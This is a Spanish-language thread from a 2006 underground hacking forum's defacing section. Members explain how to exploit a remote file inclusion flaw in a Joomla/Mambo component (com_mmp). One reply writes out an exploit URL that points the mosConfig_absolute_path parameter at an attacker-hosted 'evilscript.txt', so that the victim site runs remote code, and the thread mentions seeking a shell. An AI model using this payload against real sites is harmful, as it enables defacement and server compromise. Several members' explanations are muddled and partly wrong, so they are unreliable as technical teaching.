Nuevas NORMAS para el foro
Bienvenido(a),
Visitante
. Favor de
ingresar
o
registrarse
.
¿Perdiste tu
email de activación?
- Agosto 29, 2008, 06:36:01
Boton Buscar
Visita:
Articulos
-
Juegos Gratis
-
Da Foros
Comunidad Underground Hispana
|
Phreaking, Hacking y Seguridad
|
HacK GeneraL
|
Defacing
| Tema:
0 Usuarios y 1 Visitante están viendo este tema.
« anterior
próximo »
Páginas:
[
1
]
Autor
Tema: (Leído 569 veces)
VanNovax
Visitante
«
en:
ſeptiembre 01, 2006, 11:36:33 »
En línea
Kr0sty
Miembro
Desconectado
Mensajes: 115
Aprendiendo :)
«
Respuesta #1 en:
ſeptiembre 01, 2006, 05:41:49 »
Gracias amigo
Ahora no entendi bien lo del path, ni como encontrar esta vulnerabilidad, es decir
Citar
<?php
global $mosConfig_absolute_path;
require $mosConfig_absolute_path ."/administrator/components/com_mmp/diagnostics.mmp.php";
diagnostics();
?>
Esto donde deberia estar?
Salu2 y gracias
En línea
anonimox
Habitual
Desconectado
Mensajes: 277
«
Respuesta #2 en:
ſeptiembre 02, 2006, 06:28:17 »
Cita de: Kr0sty en ſeptiembre 01, 2006, 05:41:49
Gracias amigo
Ahora no entendi bien lo del path, ni como encontrar esta vulnerabilidad, es decir
Citar
<?php
global $mosConfig_absolute_path;
require $mosConfig_absolute_path ."/administrator/components/com_mmp/diagnostics.mmp.php";
diagnostics();
?>
Esto donde deberia estar?
Salu2 y gracias
sino me equivoco eso deberia estar en la pagina de la victima.
Es por eso que cuando queremos explotar ponemos asi
Exploit:
Citar
Para ver los enlaces debes ser usuario
Crear Usuario
o
Hacer Sesion
[path]/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://site.com/evilscript.txt?
Donde
Citar
Para ver los enlaces debes ser usuario
Crear Usuario
o
Hacer Sesion
es la pagina donde se ecuentra nuestro exploit.
O sea que funciona mas o menos asi
Desde la pagina de la victima se importa un archivo desde otro hosting donde esta el exploit.
Salu2
En línea
Para ver los enlaces debes ser usuario
Crear Usuario
o
Hacer Sesion
- Servidor para subir cosas sobre hacking
? \!/ ?
(o o)
------------------------------OOo-(_)-oOOo------------------------
Para ver los enlaces debes ser usuario
Crear Usuario
o
Hacer Sesion
Kr0sty
Miembro
Desconectado
Mensajes: 115
Aprendiendo :)
«
Respuesta #3 en:
ſeptiembre 02, 2006, 10:19:58 »
Ok, y esto :
Citar
[path]
Que seria ?
Salu2
En línea
VanNovax
Visitante
«
Respuesta #4 en:
ſeptiembre 02, 2006, 10:44:07 »
Path es una asignacion que da El programar en Php.
(Por ocio) o por configuracion General.
path siempre cambia por otra cosa.
Pero no le pares eso.
Creo que anonimo explico lo que devi haber explicado
En línea
Kr0sty
Miembro
Desconectado
Mensajes: 115
Aprendiendo :)
«
Respuesta #5 en:
ſeptiembre 02, 2006, 12:41:32 »
Citar
Path es una asignacion que da El programar en Php.
(Por ocio) o por configuracion General.
path siempre cambia por otra cosa.
Perdonen mi ignorancia pero sigo sin entender :'(
Un ejemplo aho? asi me ubico un poco mas.
Salu2
En línea
VanNovax
Visitante
«
Respuesta #6 en:
ſeptiembre 02, 2006, 05:31:39 »
Voy saliendo:
mosConfig_absolute_path
Supango que es page
Para ver los enlaces debes ser usuario
Crear Usuario
o
Hacer Sesion
page y mosConfig_absolute_path
Son un nombre para una Accion Determinada!.
Dentro del Nucleo!!
Cuando nosotros buscamos shell.
Simplemente, ejecutamos el Nucleo en el Entorno Http
Para ver los enlaces debes ser usuario
Crear Usuario
o
Hacer Sesion
Ejemplo:
mosConfig_absolute_path le di la accion de que busque a /archivos/admin/index.php
sin restricciones (Remote File Inclussion Seguro)
Eso puede Cambiar.
Lo que devez de Dar un Repaso en php.
Esto ya no es defacing.
En línea
Twister-Hack
Visitante
«
Respuesta #7 en:
Noviembre 08, 2006, 03:27:46 »
Veo que el path siempre es como los de linux, quiere decir eso que los servidores de las webs son todos Unix?
En línea
PowaZor(Ele)
Miembro
Desconectado
Mensajes: 110
«
Respuesta #8 en:
Noviembre 08, 2006, 04:32:47 »
Cita de: Twister-Hack en Noviembre 08, 2006, 03:27:46
Veo que el path siempre es como los de linux, quiere decir eso que los servidores de las webs son todos Unix?
Tambien hay Windows
En línea
Páginas:
[
1
]
Comunidad Underground Hispana
|
Phreaking, Hacking y Seguridad
|
HacK GeneraL
|
Defacing
| Tema:
« anterior
próximo »
Ir a:
Por favor selecciona un destino:
-----------------------------
Foros De Consulta General
-----------------------------
=> Novedades
=> Dudas, Comentarios Y Sugerencias
=> Top 100
=> Off-Topic
=> Revista E-Zine
===> Noticias
-----------------------------
Phreaking, Hacking y Seguridad
-----------------------------
=> HacK GeneraL
===> Ingenieria Inversa
===> Encriptacion, Cryptografia
===> TV HACK
===> Seguridad
===> Cursos y Ezines
=====> Trucos Internet
=====> Textos Hacking
===> Defacing
=> Phreaking
===> Moviles
=> Bug y Exploits
-----------------------------
Hack Novato
-----------------------------
=> Hack para newbies
=> Todo Messenger
=> Troyanos y virus
-----------------------------
Sistemas Operativos
-----------------------------
=> Windows y otros sistemas operativos no libres
===> Problemas Tecnicos Windows
=> Sistemas operativos libres.
===> GNU/Linux
===> Manuales y Tutoriales
===> Descargas
-----------------------------
Programacion
-----------------------------
=> Programación
===> Programación Basica
===> Otros Lenguajes
===> Visual Basic y Net
===> ASM
===> Programacion Shell
===> Perl
===> Carbide C/C#/C++
===> Batch
===> SQL
=> Programacion para webmasters
===> Consultas
===> Php
===> Html
===> Java - Java Script
===> Php Nuke
===> Scripts Pre-Fabricados
===> Mysql
===> CSS y Diseño Web
-----------------------------
Artes Graficas
-----------------------------
=> Diseño Grafico
===> Battle Arts
===> Flash
===> Tutoriales
===> Galerías
===> Software
-----------------------------
Area Tecnica
-----------------------------
=> Networking & Wireless
=> Overclocking, Refrigeracion y demas
=> Hardware
===> Cursos Y manuales
=> Electronica Y Robotica
-----------------------------
Programas
-----------------------------
=> Software
===> Configuraciones de software
===> Pedidos de software
=> Cracks & Serialz
=> P2p, Bittorrent, Elinks
-----------------------------
Multimedia Y Divx
-----------------------------
=> Juegos PC Y Consolas
===> Dudas ayudas y comentarios de juegos
===> Pedidos de juegos
=> Mp3
=> Multimedia
=> Peliculas Divx
-----------------------------
Entretenimiento Y sitios de interes
-----------------------------
=> Juegos, Humor y Adultos. (Diversión)
===> Adultos
=> Paginas Webs Recomendadas
=> Videos
Powered by SMF 1.1.5
|
SMF © 2006-2007, Simple Machines LLC
Loading...